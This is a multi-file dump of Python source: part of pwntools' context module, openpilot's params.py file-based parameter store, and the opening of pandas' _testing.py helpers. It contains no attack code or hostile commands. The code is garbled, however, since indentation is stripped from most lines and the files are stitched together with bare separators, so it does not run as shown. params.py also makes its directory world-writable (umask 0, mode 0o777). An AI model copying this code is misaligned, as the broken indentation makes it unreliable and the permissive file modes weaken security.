context.adb_host = os.environ.get('ANDROID_ADB_SERVER_HOST')
if 'ANDROID_ADB_SERVER_PORT' in os.environ:
context.adb_port = int(os.getenv('ANDROID_ADB_SERVER_PORT'))
def LocalContext(function):
"""
Wraps the specified function on a context.local() block, using kwargs.
Example:
>>> context.clear()
>>> @LocalContext
... def printArch():
... print(context.arch)
>>> printArch()
i386
>>> printArch(arch='arm')
arm
"""
@functools.wraps(function)
def setter(*a, **kw):
with context.local(**{k:kw.pop(k) for k,v in tuple(kw.items()) if isinstance(getattr(ContextType, k, None), property)}):
arch = context.arch
bits = context.bits
endian = context.endian
# Prevent the user from doing silly things with invalid
# architecture / bits / endianness combinations.
if (arch == 'i386' and bits != 32) \
or (arch == 'amd64' and bits != 64):
raise AttributeError("Invalid arch/bits combination: %s/%s" % (arch, bits))
if arch in ('i386', 'amd64') and endian == 'big':
raise AttributeError("Invalid arch/endianness combination: %s/%s" % (arch, endian))
return function(*a, **kw)
return setter
def LocalNoarchContext(function):
"""
Same as LocalContext, but resets arch to :const:`'none'` by default
Example:
>>> @LocalNoarchContext
... def printArch():
... print(context.arch)
>>> printArch()
none
"""
@functools.wraps(function)
def setter(*a, **kw):
kw.setdefault('arch', 'none')
with context.local(**{k:kw.pop(k) for k,v in tuple(kw.items()) if isinstance(getattr(ContextType, k, None), property)}):
return function(*a, **kw)
return setter
# Read configuration options from the context section
def update_context_defaults(section):
# Circular imports FTW!
from pwnlib.util import safeeval
from pwnlib.log import getLogger
log = getLogger(__name__)
for key, value in section.items():
if key not in ContextType.defaults:
log.warn("Unknown configuration option %r in section %r" % (key, 'context'))
continue
default = ContextType.defaults[key]
if isinstance(default, six.string_types + six.integer_types + (tuple, list, dict)):
value = safeeval.expr(value)
else:
log.warn("Unsupported configuration option %r in section %r" % (key, 'context'))
# Attempt to set the value, to see if it is valid:
try:
with context.local(**{key: value}):
value = getattr(context, key)
except (ValueError, AttributeError) as e:
log.warn("Could not set context.%s=%s via pwn.conf (%s)", key, section[key], e)
continue
ContextType.defaults[key] = value
register_config('context', update_context_defaults)
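# A minimal usage sketch (not part of the original module), assuming pwntools
# is installed so `context` behaves as documented above: arch implies defaults,
# local() scopes changes, and pwnlib's Thread inherits the creator's context.
if __name__ == '__main__':
    context.clear()
    context.arch = 'arm'             # implies bits=32, endian='little'
    with context.local(bits=64):     # scoped override, undone on exit
        assert context.bits == 64
    assert context.bits == 32
    def show():
        print(context.arch)
    t = Thread(target=show)
    t.start(); t.join()              # prints: arm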
|
params.py
|
#!/usr/bin/env python3
"""ROS has a parameter server, we have files.
The parameter store is a persistent key value store, implemented as a directory with a writer lock.
On Android, we store params under params_dir = /data/params. The writer lock is a file
"<params_dir>/.lock" taken using flock(), and data is stored in a directory symlinked to by
"<params_dir>/d".
Each key, value pair is stored as a file named <key> with contents <value>, located in
<params_dir>/d/<key>
Readers of a single key can just open("<params_dir>/d/<key>") and read the file contents.
Readers who want a consistent snapshot of multiple keys should take the lock.
Writers should take the lock before modifying anything. Writers should also leave the DB in a
consistent state after a crash. The implementation below does this by copying all params to a temp
directory <params_dir>/<tmp>, then atomically symlinking <params_dir>/<d> to <params_dir>/<tmp>
before deleting the old <params_dir>/<d> directory.
Writers that only modify a single key can simply take the lock, then swap the corresponding value
file in place without messing with <params_dir>/d.
"""
import time
import os
import string
import binascii
import errno
import sys
import shutil
import fcntl
import tempfile
import threading
from enum import Enum
from common.basedir import PARAMS
def mkdirs_exists_ok(path):
try:
os.makedirs(path)
except OSError:
if not os.path.isdir(path):
raise
class TxType(Enum):
PERSISTENT = 1
CLEAR_ON_MANAGER_START = 2
CLEAR_ON_PANDA_DISCONNECT = 3
class UnknownKeyName(Exception):
pass
keys = {
"AccessToken": [TxType.CLEAR_ON_MANAGER_START],
"AthenadPid": [TxType.PERSISTENT],
"CalibrationParams": [TxType.PERSISTENT],
"CarParams": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
"CarParamsCache": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
"CarVin": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
"CommunityFeaturesToggle": [TxType.PERSISTENT],
"CompletedTrainingVersion": [TxType.PERSISTENT],
"ControlsParams": [TxType.PERSISTENT],
"DisablePowerDown": [TxType.PERSISTENT],
"DoUninstall": [TxType.CLEAR_ON_MANAGER_START],
"DongleId": [TxType.PERSISTENT],
"GitBranch": [TxType.PERSISTENT],
"GitCommit": [TxType.PERSISTENT],
"GitRemote": [TxType.PERSISTENT],
"GithubSshKeys": [TxType.PERSISTENT],
"HasAcceptedTerms": [TxType.PERSISTENT],
"HasCompletedSetup": [TxType.PERSISTENT],
"IsLdwEnabled": [TxType.PERSISTENT],
"IsGeofenceEnabled": [TxType.PERSISTENT],
"IsMetric": [TxType.PERSISTENT],
"IsOffroad": [TxType.CLEAR_ON_MANAGER_START],
"IsRHD": [TxType.PERSISTENT],
"IsTakingSnapshot": [TxType.CLEAR_ON_MANAGER_START],
"IsUpdateAvailable": [TxType.CLEAR_ON_MANAGER_START],
"IsUploadRawEnabled": [TxType.PERSISTENT],
"LastUpdateTime": [TxType.PERSISTENT],
"LimitSetSpeed": [TxType.PERSISTENT],
"LimitSetSpeedNeural": [TxType.PERSISTENT],
"LiveParameters": [TxType.PERSISTENT],
"LongitudinalControl": [TxType.PERSISTENT],
"OpenpilotEnabledToggle": [TxType.PERSISTENT],
"LaneChangeEnabled": [TxType.PERSISTENT],
"PandaFirmware": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
"PandaFirmwareHex": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
"PandaDongleId": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
"Passive": [TxType.PERSISTENT],
"RecordFront": [TxType.PERSISTENT],
"ReleaseNotes": [TxType.PERSISTENT],
"ShouldDoUpdate": [TxType.CLEAR_ON_MANAGER_START],
"SpeedLimitOffset": [TxType.PERSISTENT],
"SubscriberInfo": [TxType.PERSISTENT],
"TermsVersion": [TxType.PERSISTENT],
"TrainingVersion": [TxType.PERSISTENT],
"UpdateAvailable": [TxType.CLEAR_ON_MANAGER_START],
"UpdateFailedCount": [TxType.CLEAR_ON_MANAGER_START],
"Version": [TxType.PERSISTENT],
"Offroad_ChargeDisabled": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
"Offroad_ConnectivityNeeded": [TxType.CLEAR_ON_MANAGER_START],
"Offroad_ConnectivityNeededPrompt": [TxType.CLEAR_ON_MANAGER_START],
"Offroad_TemperatureTooHigh": [TxType.CLEAR_ON_MANAGER_START],
"Offroad_PandaFirmwareMismatch": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
"Offroad_InvalidTime": [TxType.CLEAR_ON_MANAGER_START],
"Offroad_IsTakingSnapshot": [TxType.CLEAR_ON_MANAGER_START],
}
def fsync_dir(path):
fd = os.open(path, os.O_RDONLY)
try:
os.fsync(fd)
finally:
os.close(fd)
class FileLock():
def __init__(self, path, create):
self._path = path
self._create = create
self._fd = None
def acquire(self):
self._fd = os.open(self._path, os.O_CREAT if self._create else 0)
fcntl.flock(self._fd, fcntl.LOCK_EX)
def release(self):
if self._fd is not None:
os.close(self._fd)
self._fd = None
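# Minimal FileLock usage (a sketch; the path is illustrative):
#   lock = FileLock("/data/params/.lock", create=True)
#   lock.acquire()
#   try:
#       ...  # read or modify the params directory
#   finally:
#       lock.release()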
class DBAccessor():
def __init__(self, path):
self._path = path
self._vals = None
def keys(self):
self._check_entered()
return self._vals.keys()
def get(self, key):
self._check_entered()
try:
return self._vals[key]
except KeyError:
return None
def _get_lock(self, create):
lock = FileLock(os.path.join(self._path, ".lock"), create)
lock.acquire()
return lock
def _read_values_locked(self):
"""Callers should hold a lock while calling this method."""
vals = {}
try:
data_path = self._data_path()
keys = os.listdir(data_path)
for key in keys:
with open(os.path.join(data_path, key), "rb") as f:
vals[key] = f.read()
except (OSError, IOError) as e:
# Either the DB hasn't been created yet, or somebody wrote a bug and left the DB in an
# inconsistent state. Either way, return empty.
if e.errno == errno.ENOENT:
return {}
return vals
def _data_path(self):
return os.path.join(self._path, "d")
def _check_entered(self):
if self._vals is None:
raise Exception("Must call __enter__ before using DB")
class DBReader(DBAccessor):
def __enter__(self):
try:
lock = self._get_lock(False)
except OSError as e:
# Do not create lock if it does not exist.
      if e.errno == errno.ENOENT:
        self._vals = {}
        return self
      raise
try:
# Read everything.
self._vals = self._read_values_locked()
return self
finally:
lock.release()
def __exit__(self, type, value, traceback): pass
class DBWriter(DBAccessor):
def __init__(self, path):
super(DBWriter, self).__init__(path)
self._lock = None
self._prev_umask = None
def put(self, key, value):
self._vals[key] = value
def delete(self, key):
self._vals.pop(key, None)
def __enter__(self):
mkdirs_exists_ok(self._path)
# Make sure we can write and that permissions are correct.
self._prev_umask = os.umask(0)
try:
os.chmod(self._path, 0o777)
self._lock = self._get_lock(True)
self._vals = self._read_values_locked()
except:
os.umask(self._prev_umask)
self._prev_umask = None
raise
return self
def __exit__(self, type, value, traceback):
self._check_entered()
try:
# data_path refers to the externally used path to the params. It is a symlink.
# old_data_path is the path currently pointed to by data_path.
# tempdir_path is a path where the new params will go, which the new data path will point to.
# new_data_path is a temporary symlink that will atomically overwrite data_path.
#
# The current situation is:
# data_path -> old_data_path
# We're going to write params data to tempdir_path
# tempdir_path -> params data
# Then point new_data_path to tempdir_path
# new_data_path -> tempdir_path
# Then atomically overwrite data_path with new_data_path
# data_path -> tempdir_path
old_data_path = None
new_data_path = None
tempdir_path = tempfile.mkdtemp(prefix=".tmp", dir=self._path)
try:
# Write back all keys.
os.chmod(tempdir_path, 0o777)
for k, v in self._vals.items():
with open(os.path.join(tempdir_path, k), "wb") as f:
f.write(v)
f.flush()
os.fsync(f.fileno())
fsync_dir(tempdir_path)
data_path = self._data_path()
try:
old_data_path = os.path.join(self._path, os.readlink(data_path))
except (OSError, IOError):
# NOTE(mgraczyk): If other DB implementations have bugs, this could cause
# copies to be left behind, but we still want to overwrite.
pass
new_data_path = "{}.link".format(tempdir_path)
os.symlink(os.path.basename(tempdir_path), new_data_path)
os.rename(new_data_path, data_path)
fsync_dir(self._path)
finally:
# If the rename worked, we can delete the old data. Otherwise delete the new one.
success = new_data_path is not None and os.path.exists(data_path) and (
os.readlink(data_path) == os.path.basename(tempdir_path))
if success:
if old_data_path is not None:
shutil.rmtree(old_data_path)
else:
shutil.rmtree(tempdir_path)
# Regardless of what happened above, there should be no link at new_data_path.
if new_data_path is not None and os.path.islink(new_data_path):
os.remove(new_data_path)
finally:
os.umask(self._prev_umask)
self._prev_umask = None
# Always release the lock.
self._lock.release()
self._lock = None
def read_db(params_path, key):
path = "%s/d/%s" % (params_path, key)
try:
with open(path, "rb") as f:
return f.read()
except IOError:
return None
def write_db(params_path, key, value):
if isinstance(value, str):
value = value.encode('utf8')
prev_umask = os.umask(0)
lock = FileLock(params_path+"/.lock", True)
lock.acquire()
try:
tmp_path = tempfile.mktemp(prefix=".tmp", dir=params_path)
with open(tmp_path, "wb") as f:
f.write(value)
f.flush()
os.fsync(f.fileno())
path = "%s/d/%s" % (params_path, key)
os.rename(tmp_path, path)
fsync_dir(os.path.dirname(path))
finally:
os.umask(prev_umask)
lock.release()
class Params():
def __init__(self, db=PARAMS):
self.db = db
# create the database if it doesn't exist...
if not os.path.exists(self.db+"/d"):
with self.transaction(write=True):
pass
def clear_all(self):
shutil.rmtree(self.db, ignore_errors=True)
with self.transaction(write=True):
pass
def transaction(self, write=False):
if write:
return DBWriter(self.db)
else:
return DBReader(self.db)
def _clear_keys_with_type(self, tx_type):
with self.transaction(write=True) as txn:
for key in keys:
if tx_type in keys[key]:
txn.delete(key)
def manager_start(self):
self._clear_keys_with_type(TxType.CLEAR_ON_MANAGER_START)
def panda_disconnect(self):
self._clear_keys_with_type(TxType.CLEAR_ON_PANDA_DISCONNECT)
def delete(self, key):
with self.transaction(write=True) as txn:
txn.delete(key)
def get(self, key, block=False, encoding=None):
if key not in keys:
raise UnknownKeyName(key)
while 1:
ret = read_db(self.db, key)
if not block or ret is not None:
break
# is polling really the best we can do?
time.sleep(0.05)
if ret is not None and encoding is not None:
ret = ret.decode(encoding)
return ret
def put(self, key, dat):
"""
Warning: This function blocks until the param is written to disk!
In very rare cases this can take over a second, and your code will hang.
Use the put_nonblocking helper function in time sensitive code, but
in general try to avoid writing params as much as possible.
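        Example (a sketch; "DongleId" is one of the keys registered above):
          Params().put("DongleId", "0123456789abcdef")     # blocks until fsync'd
          put_nonblocking("DongleId", "0123456789abcdef")  # returns a Thread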
"""
if key not in keys:
raise UnknownKeyName(key)
write_db(self.db, key, dat)
def put_nonblocking(key, val):
def f(key, val):
params = Params()
params.put(key, val)
t = threading.Thread(target=f, args=(key, val))
t.start()
return t
if __name__ == "__main__":
params = Params()
if len(sys.argv) > 2:
params.put(sys.argv[1], sys.argv[2])
else:
for k in keys:
pp = params.get(k)
if pp is None:
print("%s is None" % k)
elif all(chr(c) in string.printable for c in pp):
print("%s = %s" % (k, pp))
else:
print("%s = %s" % (k, binascii.hexlify(pp)))
# Test multiprocess:
# seq 0 100000 | xargs -P20 -I{} python common/params.py DongleId {} && sleep 0.05
# while python common/params.py DongleId; do sleep 0.05; done
|
_testing.py
|
import bz2
from collections import Counter
from contextlib import contextmanager
from datetime import datetime
from functools import wraps
import gzip
import os
from shutil import rmtree
import string
import tempfile
from typing import Any, Callable, List, Optional, Type, Union, cast
import warnings
import zipfile
import numpy as np
from numpy.random import rand, randn
from pandas._config.localization import ( # noqa:F401
can_set_locale,
get_locales,
set_locale,
)
import pandas._libs.testing as _testing
from pandas._typing import FilePathOrBuffer, FrameOrSeries
from pandas.compat import _get_lzma_file, _import_lzma
from pandas.core.dtypes.common import (
is_bool,
is_categorical_dtype,
is_datetime64_dtype,
is_datetime64tz_dtype,
is_extension_array_dtype,
is_interval_dtype,
is_list_like,
is_number,
is_period_dtype,
is_sequence,
is_timedelta64_dtype,
needs_i8_conversion,
)
from pandas.core.dtypes.missing import array_equivalent
import pandas as pd
from pandas import (
Categorical,
CategoricalIndex,
DataFrame,
DatetimeIndex,
Index,
IntervalIndex,
MultiIndex,
RangeIndex,
Series,
bdate_range,
)
from pandas.core.algorithms import take_1d
from pandas.core.arrays import (
DatetimeArray,
ExtensionArray,
IntervalArray,
PeriodArray,
TimedeltaArray,
period_array,
)
from pandas.io.common import urlopen
from pandas.io.formats.printing import pprint_thing
lzma = _import_lzma()
N = 30
K = 4
_RAISE_NETWORK_ERROR_DEFAULT = False
# set testing_mode
_testing_mode_warnings = (DeprecationWarning, ResourceWarning)
def set_testing_mode():
# set the testing mode filters
testing_mode = os.environ.get("PANDAS_TESTING_MODE", "None")
if "deprecate" in testing_mode:
warnings.simplefilter("always", _testing_mode_warnings)
def reset_testing_mode():
# reset the testing mode filters
testing_mode = os.environ.get("PANDAS_TESTING_MODE", "None")
if "deprecate" in testing_mode:
warnings.simplefilter("ignore", _testing_mode_warnings)
set_testing_mode()
def reset_display_options():
"""
Reset the display options for printing and representing objects.
"""
pd.reset_option("^display.", silent=True)
def round_trip_pickle(
obj: Any, path: Optional[FilePathOrBuffer] = None
) -> FrameOrSeries:
"""
Pickle an object and then read it again.
Parameters
----------
obj : any object
The object to pickle and then re-read.
path : str, path object or file-like object, default None
The path where the pickled object is written and then read.
Returns
-------
pandas object
The original object that was pickled and then re-read.
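    Examples
    --------
    A minimal sketch (the pickle round-trips through a temporary file):

    >>> import pandas as pd
    >>> import pandas._testing as tm
    >>> df = pd.DataFrame({"a": [1, 2]})
    >>> tm.round_trip_pickle(df)
       a
    0  1
    1  2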
"""
_path = path
if _path is None:
_path = f"__{rands(10)}__.pickle"
with ensure_clean(_path) as temp_path:
pd.to_pickle(obj, temp_path)
return pd.read_pickle(temp_path)
def round_trip_pathlib(writer, reader, path: Optional[str] = None):
"""
Write an object to file specified by a pathlib.Path and read it back
Parameters
----------
writer : callable bound to pandas object
IO writing function (e.g. DataFrame.to_csv )
reader : callable
IO reading function (e.g. pd.read_csv )
path : str, default None
The path where the object is written and then read.
Returns
-------
pandas object
The original object that was serialized and then re-read.
"""
import pytest
Path = pytest.importorskip("pathlib").Path
if path is None:
path = "___pathlib___"
with ensure_clean(path) as path:
writer(Path(path))
obj = reader(Path(path))
return obj
def round_trip_localpath(writer, reader, path: Optional[str] = None):
"""
Write an object to file specified by a py.path LocalPath and read it back.
Parameters
----------
writer : callable bound to pandas object
IO writing function (e.g. DataFrame.to_csv )
reader : callable
IO reading function (e.g. pd.read_csv )
path : str, default None
The path where the object is written and then read.
Returns
-------
pandas object
The original object that was serialized and then re-read.
"""
import pytest
LocalPath = pytest.importorskip("py.path").local
if path is None:
path = "___localpath___"
with ensure_clean(path) as path:
writer(LocalPath(path))
obj = reader(LocalPath(path))
return obj
@contextmanager
def decompress_file(path, compression):
"""
Open a compressed file and return a file object.
Parameters
----------
path : str
The path where the file is read from.
compression : {'gzip', 'bz2', 'zip', 'xz', None}
Name of the decompression to use
Returns
-------
file object
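    Examples
    --------
    A sketch, assuming a gzip-compressed file was written beforehand (the
    path is illustrative):

    >>> import gzip
    >>> with gzip.open("data.txt.gz", "wb") as f:  # doctest: +SKIP
    ...     _ = f.write(b"hello")
    >>> with decompress_file("data.txt.gz", compression="gzip") as f:  # doctest: +SKIP
    ...     f.read()
    b'hello'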
"""
if compression is None:
f = open(path, "rb")
elif compression == "gzip":
f = gzip.open(path, "rb")
elif compression == "bz2":
f = bz2.BZ2File(path, "rb")
elif compression == "xz":
f = _get_lzma_file(lzma)(path, "rb")
elif compression == "zip":
zip_file = zipfile.ZipFile(path)
zip_names = zip_file.namelist()
if len(zip_names) == 1:
f = zip_file.open(zip_names.pop())
else:
raise ValueError(f"ZIP file {path} error. Only one file per ZIP.")
else:
raise ValueError(f"Unrecognized compression type: {compression}")
try:
yield f
finally:
f.close()
if compression == "zip":
zip_file.close()
def write_to_compressed(compression, path, data, dest="test"):
"""
Write data to a compressed file.
Parameters
----------
compression : {'gzip', 'bz2', 'zip', 'xz'}
The compression type to use.
path : str
The file path to write the data.
data : str
The data to write.
dest : str, default "test"
The destination file (for ZIP only)
Raises
------
ValueError : An invalid compression value was passed in.
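    Examples
    --------
    A sketch (the path is illustrative; `data` must be bytes for the
    non-zip writers):

    >>> write_to_compressed("gzip", "data.txt.gz", b"hello")  # doctest: +SKIP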
"""
if compression == "zip":
import zipfile
compress_method = zipfile.ZipFile
elif compression == "gzip":
import gzip
compress_method = gzip.GzipFile
elif compression == "bz2":
import bz2
compress_method = bz2.BZ2File
elif compression == "xz":
compress_method = _get_lzma_file(lzma)
else:
raise ValueError(f"Unrecognized compression type: {compression}")
if compression == "zip":
mode = "w"
args = (dest, data)
method = "writestr"
else:
mode = "wb"
args = (data,)
method = "write"
with compress_method(path, mode=mode) as f:
getattr(f, method)(*args)
def assert_almost_equal(
left,
right,
check_dtype: Union[bool, str] = "equiv",
check_less_precise: Union[bool, int] = False,
**kwargs,
):
"""
Check that the left and right objects are approximately equal.
By approximately equal, we refer to objects that are numbers or that
contain numbers which may be equivalent to specific levels of precision.
Parameters
----------
left : object
right : object
check_dtype : bool or {'equiv'}, default 'equiv'
Check dtype if both a and b are the same type. If 'equiv' is passed in,
then `RangeIndex` and `Int64Index` are also considered equivalent
when doing type checking.
check_less_precise : bool or int, default False
Specify comparison precision. 5 digits (False) or 3 digits (True)
after decimal points are compared. If int, then specify the number
of digits to compare.
When comparing two numbers, if the first number has magnitude less
than 1e-5, we compare the two numbers directly and check whether
they are equivalent within the specified precision. Otherwise, we
compare the **ratio** of the second number to the first number and
check whether it is equivalent to 1 within the specified precision.
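    Examples
    --------
    Differences beyond the default 5-digit precision are ignored
    (a minimal sketch):

    >>> import pandas._testing as tm
    >>> tm.assert_almost_equal(0.30000001, 0.3)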
"""
if isinstance(left, pd.Index):
assert_index_equal(
left,
right,
check_exact=False,
exact=check_dtype,
check_less_precise=check_less_precise,
**kwargs,
)
elif isinstance(left, pd.Series):
assert_series_equal(
left,
right,
check_exact=False,
check_dtype=check_dtype,
check_less_precise=check_less_precise,
**kwargs,
)
elif isinstance(left, pd.DataFrame):
assert_frame_equal(
left,
right,
check_exact=False,
check_dtype=check_dtype,
check_less_precise=check_less_precise,
**kwargs,
)
else:
# Other sequences.
if check_dtype:
if is_number(left) and is_number(right):
# Do not compare numeric classes, like np.float64 and float.
pass
elif is_bool(left) and is_bool(right):
# Do not compare bool classes, like np.bool_ and bool.
pass
else:
if isinstance(left, np.ndarray) or isinstance(right, np.ndarray):
obj = "numpy array"
else:
obj = "Input"
assert_class_equal(left, right, obj=obj)
_testing.assert_almost_equal(
left,
right,
check_dtype=check_dtype,
check_less_precise=check_less_precise,
**kwargs,
)
def _check_isinstance(left, right, cls):
"""
Helper method for our assert_* methods that ensures that
the two objects being compared have the right type before
proceeding with the comparison.
Parameters
----------
left : The first object being compared.
right : The second object being compared.
cls : The class type to check against.
Raises
------
AssertionError : Either `left` or `right` is not an instance of `cls`.
"""
cls_name = cls.__name__
if not isinstance(left, cls):
raise AssertionError(
f"{cls_name} Expected type {cls}, found {type(left)} instead"
)
if not isinstance(right, cls):
raise AssertionError(
f"{cls_name} Expected type {cls}, found {type(right)} instead"
)
def assert_dict_equal(left, right, compare_keys: bool = True):
_check_isinstance(left, right, dict)
_testing.assert_dict_equal(left, right, compare_keys=compare_keys)
def randbool(size=(), p: float = 0.5):
return rand(*size) <= p
RANDS_CHARS = np.array(list(string.ascii_letters + string.digits), dtype=(np.str_, 1))
RANDU_CHARS = np.array(
list("".join(map(chr, range(1488, 1488 + 26))) + string.digits),
dtype=(np.unicode_, 1),
)
def rands_array(nchars, size, dtype="O"):
"""
    Generate an array of random strings.
"""
retval = (
np.random.choice(RANDS_CHARS, size=nchars * np.prod(size))
.view((np.str_, nchars))
.reshape(size)
)
if dtype is None:
return retval
else:
return retval.astype(dtype)
def randu_array(nchars, size, dtype="O"):
"""
Generate an array of unicode strings.
"""
retval = (
np.random.choice(RANDU_CHARS, size=nchars * np.prod(size))
.view((np.unicode_, nchars))
.reshape(size)
)
if dtype is None:
return retval
else:
return retval.astype(dtype)
def rands(nchars):
"""
    Generate one random string.
See `rands_array` if you want to create an array of random strings.
"""
return "".join(np.random.choice(RANDS_CHARS, nchars))
def randu(nchars):
"""
Generate one random unicode string.
See `randu_array` if you want to create an array of random unicode strings.
"""
return "".join(np.random.choice(RANDU_CHARS, nchars))
def close(fignum=None):
from matplotlib.pyplot import get_fignums, close as _close
if fignum is None:
for fignum in get_fignums():
_close(fignum)
else:
_close(fignum)
# -----------------------------------------------------------------------------
# contextmanager to ensure the file cleanup
@contextmanager
def ensure_clean(filename=None, return_filelike=False, **kwargs):
"""
    Gets a temporary path and ensures it is removed on close.
Parameters
----------
filename : str (optional)
if None, creates a temporary file which is then removed when out of
scope. if passed, creates temporary file with filename as ending.
return_filelike : bool (default False)
if True, returns a file-like which is *always* cleaned. Necessary for
savefig and other functions which want to append extensions.
**kwargs
Additional keywords passed in for creating a temporary file.
    :meth:`tempfile.TemporaryFile` is used when `return_filelike` is ``True``.
:meth:`tempfile.mkstemp` is used when `return_filelike` is ``False``.
Note that the `filename` parameter will be passed in as the `suffix`
argument to either function.
See Also
--------
tempfile.TemporaryFile
tempfile.mkstemp
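    Examples
    --------
    A typical pattern (a sketch; the given name becomes the suffix of a
    temporary file that is deleted on exit):

    >>> with ensure_clean("my_file.csv") as path:  # doctest: +SKIP
    ...     pd.DataFrame({"a": [1]}).to_csv(path)
    ...     result = pd.read_csv(path)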
"""
filename = filename or ""
fd = None
kwargs["suffix"] = filename
if return_filelike:
f = tempfile.TemporaryFile(**kwargs)
try:
yield f
finally:
f.close()
else:
# Don't generate tempfile if using a path with directory specified.
if len(os.path.dirname(filename)):
raise ValueError("Can't pass a qualified name to ensure_clean()")
try:
fd, filename = tempfile.mkstemp(**kwargs)
except UnicodeEncodeError:
import pytest
pytest.skip("no unicode file names on this system")
try:
yield filename
finally:
try:
os.close(fd)
except OSError:
print(f"Couldn't close file descriptor: {fd} (file: {filename})")
try:
if os.path.exists(filename):
os.remove(filename)
except OSError as e:
print(f"Exception on removing file: {e}")
@contextmanager
def ensure_clean_dir():
"""
    Get a temporary directory path and ensure it is removed on close.
Yields
------
Temporary directory path
"""
directory_name = tempfile.mkdtemp(suffix="")
try:
yield directory_name
finally:
try:
rmtree(directory_name)
except OSError:
pass
@contextmanager
def ensure_safe_environment_variables():
"""
Get a context manager to safely set environment variables
All changes will be undone on close, hence environment variables set
within this contextmanager will neither persist nor change global state.
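    Examples
    --------
    A sketch (the variable name is illustrative); changes do not leak out
    of the block:

    >>> import os
    >>> with ensure_safe_environment_variables():
    ...     os.environ["SOME_FLAG"] = "1"
    >>> "SOME_FLAG" in os.environ
    False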
"""
saved_environ = dict(os.environ)
try:
yield
finally:
os.environ.clear()
os.environ.update(saved_environ)
# -----------------------------------------------------------------------------
# Comparators
def equalContents(arr1, arr2) -> bool:
"""
Checks if the set of unique elements of arr1 and arr2 are equivalent.
"""
return frozenset(arr1) == frozenset(arr2)
def assert_index_equal(
left: Index,
right: Index,
exact: Union[bool, str] = "equiv",
check_names: bool = True,
check_less_precise: Union[bool, int] = False,
check_exact: bool = True,
check_categorical: bool = True,
obj: str = "Index",
) -> None:
"""
Check that left and right Index are equal.
Parameters
----------
left : Index
right : Index
exact : bool or {'equiv'}, default 'equiv'
Whether to check the Index class, dtype and inferred_type
are identical. If 'equiv', then RangeIndex can be substituted for
Int64Index as well.
check_names : bool, default True
Whether to check the names attribute.
check_less_precise : bool or int, default False
Specify comparison precision. Only used when check_exact is False.
5 digits (False) or 3 digits (True) after decimal points are compared.
If int, then specify the digits to compare.
check_exact : bool, default True
Whether to compare number exactly.
check_categorical : bool, default True
Whether to compare internal Categorical exactly.
obj : str, default 'Index'
Specify object name being compared, internally used to show appropriate
assertion message.
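    Examples
    --------
    A minimal passing comparison:

    >>> import pandas as pd
    >>> import pandas._testing as tm
    >>> a = pd.Index([1, 2, 3])
    >>> b = pd.Index([1, 2, 3])
    >>> tm.assert_index_equal(a, b)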
"""
__tracebackhide__ = True
def _check_types(l, r, obj="Index"):
if exact:
assert_class_equal(l, r, exact=exact, obj=obj)
# Skip exact dtype checking when `check_categorical` is False
if check_categorical:
assert_attr_equal("dtype", l, r, obj=obj)
# allow string-like to have different inferred_types
if l.inferred_type in ("string"):
assert r.inferred_type in ("string")
else:
assert_attr_equal("inferred_type", l, r, obj=obj)
def _get_ilevel_values(index, level):
# accept level number only
unique = index.levels[level]
level_codes = index.codes[level]
filled = take_1d(unique._values, level_codes, fill_value=unique._na_value)
values = unique._shallow_copy(filled, name=index.names[level])
return values
# instance validation
_check_isinstance(left, right, Index)
# class / dtype comparison
_check_types(left, right, obj=obj)
# level comparison
if left.nlevels != right.nlevels:
msg1 = f"{obj} levels are different"
msg2 = f"{left.nlevels}, {left}"
msg3 = f"{right.nlevels}, {right}"
raise_assert_detail(obj, msg1, msg2, msg3)
# length comparison
if len(left) != len(right):
msg1 = f"{obj} length are different"
msg2 = f"{len(left)}, {left}"
msg3 = f"{len(right)}, {right}"
raise_assert_detail(obj, msg1, msg2, msg3)
    # MultiIndex special comparison for more friendly error messages
if left.nlevels > 1:
left = cast(MultiIndex, left)
right = cast(MultiIndex, right)
for level in range(left.nlevels):
# cannot use get_level_values here because it can change dtype
llevel = _get_ilevel_values(left, level)
rlevel = _get_ilevel_values(right, level)
lobj = f"MultiIndex level [{level}]"
assert_index_equal(
llevel,
rlevel,
exact=exact,
check_names=check_names,
check_less_precise=check_less_precise,
check_exact=check_exact,
obj=lobj,
)
# get_level_values may change dtype
_check_types(left.levels[level], right.levels[level], obj=obj)
# skip exact index checking when `check_categorical` is False
if check_exact and check_categorical:
if not left.equals(right):
diff = np.sum((left.values != right.values).astype(int)) * 100.0 / len(left)
msg = f"{obj} values are different ({np.round(diff, 5)} %)"
raise_assert_detail(obj, msg, left, right)
else:
_testing.assert_almost_equal(
left.values,
right.values,
check_less_precise=check_less_precise,
check_dtype=exact,
obj=obj,
lobj=left,
robj=right,
)
# metadata comparison
if check_names:
assert_attr_equal("names", left, right, obj=obj)
if isinstance(left, pd.PeriodIndex) or isinstance(right, pd.PeriodIndex):
assert_attr_equal("freq", left, right, obj=obj)
if isinstance(left, pd.IntervalIndex) or isinstance(right, pd.IntervalIndex):
assert_interval_array_equal(left.values, right.values)
if check_categorical:
if is_categorical_dtype(left) or is_categorical_dtype(right):
assert_categorical_equal(left.values, right.values, obj=f"{obj} category")
def assert_class_equal(left, right, exact: Union[bool, str] = True, obj="Input"):
"""
Checks classes are equal.
"""
__tracebackhide__ = True
def repr_class(x):
if isinstance(x, Index):
# return Index as it is to include values in the error message
return x
try:
return type(x).__name__
except AttributeError:
return repr(type(x))
if exact == "equiv":
if type(left) != type(right):
# allow equivalence of Int64Index/RangeIndex
types = {type(left).__name__, type(right).__name__}
if len(types - {"Int64Index", "RangeIndex"}):
msg = f"{obj} classes are not equivalent"
raise_assert_detail(obj, msg, repr_class(left), repr_class(right))
elif exact:
if type(left) != type(right):
msg = f"{obj} classes are different"
raise_assert_detail(obj, msg, repr_class(left), repr_class(right))
def assert_attr_equal(attr, left, right, obj="Attributes"):
"""checks attributes are equal. Both objects must have attribute.
Parameters
----------
attr : str
Attribute name being compared.
left : object
right : object
obj : str, default 'Attributes'
Specify object name being compared, internally used to show appropriate
assertion message
"""
